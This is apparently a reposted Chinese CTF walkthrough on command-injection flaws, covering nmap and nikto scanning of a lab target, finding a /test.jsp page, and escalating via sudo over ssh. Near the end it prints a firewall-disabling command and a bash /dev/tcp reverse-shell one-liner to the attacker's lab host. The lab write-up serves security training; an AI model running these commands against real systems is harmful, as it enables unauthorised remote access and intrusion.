CTF-命令执行

本文阅读 2 分钟
首页 Linux,系统 正文

当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到 命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。

kali 192.168.20.128

靶机 192.168.20.136

链接:https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q

提取码:t1x0

nmap -sV 192.168.20.136

img

访问192.168.20.136:8080

发现敏感信息

img

敏感信息探测

nikto -host http://192.168.20.136:8080

img

发现/test.jsp并进行访问

img

列出/tmp目录下的文件

img

列出/home目录下的内容

img

读取敏感信息

img

利用ssh协议执行root权限的命令

ssh bill@localhost sudo -l

img

关闭Ubuntu中的防火墙

ssh bill@localhost sudo ufw disable

img

监听端口

img

靶机反弹shell

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1

img

查看flag

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125011833
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复